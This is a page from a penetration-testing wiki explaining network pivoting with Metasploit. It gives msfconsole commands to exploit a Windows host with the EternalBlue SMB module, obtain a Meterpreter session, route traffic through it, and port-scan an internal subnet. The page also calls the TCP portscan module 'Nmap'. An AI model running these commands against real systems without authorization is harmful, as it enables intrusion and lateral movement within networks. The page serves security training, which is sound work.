Zero Day Archives
  • What is Zero Day Archives?
  • Contributors
  • Wireless Security
    • Intro to WiFi Pentesting
      • WEP Networks
      • WPS
      • WPA-PSK Networks
      • WPA & WPA2 PSK
      • WPA2 & WPA3 Enterprise Networks
      • WPA2 & WPA3-APLess
  • Reverse Engineering
    • Reverse Engineering
      • Introduction to Software Reverse Engineering
        • Introduction to Capture the Flag (CTF) Competitions
        • What are PE & Elf Binaries
        • Assembly Language for Beginner Reverse Engineers
        • Memory Registers for x86-64 (64-bit) and x86 (32-bit)
        • Reversing Tools: Command-Line Utilities for Binary Analysis
        • Reversing ELF Binaries: Techniques and Tools
      • Disassembly & Debugging
        • GDB for Reverse Engineering
        • RADARE2 for Reverse Engineering
        • GHIDRA for Reverse Engineering
        • IDA Pro for Reverse Engineering
      • Binary Exploitation
        • Buffer Overflows
          • What are Buffer Overflows and Stack Protections?
          • Commonly Exploited C Functions and Their Secure Alternatives
          • Basic Buffer Overflow in x86-64 Using GDB
        • Cryptography
          • Understanding Ciphers and Identifying Common Patterns
          • Teaching XOR Operations in Binary Exploitation
        • Return Oriented Programming (ROP)
          • Practical Guide to Exploring and Identifying Return-Oriented Programming (ROP)
        • Cracking and Patching Binaries
          • Tactics, Tools, and Procedures for Cracking and Patching Binaries
        • Ret2Win Challenges
  • Malware Analysis
    • Malware Analysis
      • Static Analysis
  • Transporting Files to/from Victims
    • Transferring Files to/from High Value Targets
      • Linux
      • Windows
      • CrackMapExec (NetExec)
  • Penetration Testing against GIT Remote Repositories
    • Targeting GIT Repositories
      • Attacking GIT
  • Network Pivoting, Port Forwarding, and Tunneling
    • Pivoting
      • Ligolo-ng
        • Basic Pivoting
        • Setup Reverse Shells through Pivot
        • Transferring Files through Pivot
      • Pivoting: Using Remote Desktop
      • ProxyChains
      • Metasploit
    • SSH Tunneling
      • SSH Local Port Forwarding
      • SSH Dynamic Port Forwarding
      • Sshuttle over SSH
    • Port Fowarding
      • Chisel Port Forwarding
      • NetSH for Port Forwarding
      • Plink for Port Forwarding
      • SoCat
      • Metasploit: Port Forwarding
  • Anti-Virus Evasion
    • Anti-Virus Evasion
      • Evasion with Metasploit
      • Evasion wtih Shellter
      • Evasion with Virus Total
  • Public Exploit Research
    • Online Exploit Research & Methods
  • Password Attacks
    • Password Attacks
      • Identifying Hashes
        • Hash Identifier Tools
      • John The Ripper
        • Cracking Passwords with John
        • Convert to Hashes with John
        • NTLM vs NTLMv2 Hashes + CrackMapExec
      • Hashcat
        • Cracking Passwords with Hashcat
      • Hydra
        • Hydra for Network Services
        • Hydra for Web Services
      • Mutating Wordlists for John & Hashcat
        • Mutating Wordlists
  • Digital Forensics & Incident Response (DFIR)
    • Digital Forensics
  • Data Science
    • Data Science/AI
  • Software Defined Radio (SDR)
    • Software Defined Radio
  • Embedded Systems Programming
    • Field Programmable Gate Arrays (FPGAs)
  • Other Resources
    • Resources for Hackers
Powered by GitBook
On this page
  1. Network Pivoting, Port Forwarding, and Tunneling
  2. Pivoting

Metasploit

Network Pivoting with Metasploit

Metasploit is a powerful framework used for penetration testing and exploiting vulnerabilities in systems. One of the key features of Metasploit is its ability to perform network pivoting, allowing attackers to move between networks once they have compromised a system. This technique can help reach systems or services that are not directly accessible from the outside world.

Metasploit allows you to set up pivoting by using Meterpreter sessions and tunneling network traffic through the compromised system. You can use a pivot as a gateway to access deeper parts of the network that are otherwise out of reach.

Setting Up Metasploit for Network Pivoting

Step 1: Compromise the Target

First, you need to exploit a vulnerability on the target system and gain a Meterpreter session. This can be done using any of Metasploit's exploits.

msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS <target_ip>
set LHOST <your_ip>
run

Once the exploit is successful, you’ll get a Meterpreter session:

meterpreter > sessions

Step 2: Enable Routing for Pivoting

Once you have a Meterpreter session, you can set up network pivoting by configuring routing on Metasploit.

Use the route command to add routes to the internal network behind your pivot. This allows Metasploit to route traffic to internal subnets via the compromised system.

To add a route to an internal network (e.g., 192.168.1.0/24), use:

meterpreter > route add 192.168.1.0 255.255.255.0 <session_id>

Here:

  • 192.168.1.0/24 is the internal network you wish to access.

  • <session_id> is the session ID of the compromised host.

Step 3: Verify Routing

To check the current routing configuration, use:

meterpreter > route

This will list all the routes you’ve configured, and you can confirm that traffic is properly being routed through the compromised host.

Step 4: Access Internal Systems

Now that the routing is set up, you can interact with internal systems by using Metasploit modules or tools that support routing through your pivot.

For example, you can use Nmap to scan an internal network:

msfconsole
use auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.1.0/24
set RPORT 80
run

The traffic will be routed through your Meterpreter session, allowing you to scan internal systems that are otherwise inaccessible.

PreviousProxyChainsNextSSH Tunneling

Last updated 18 days ago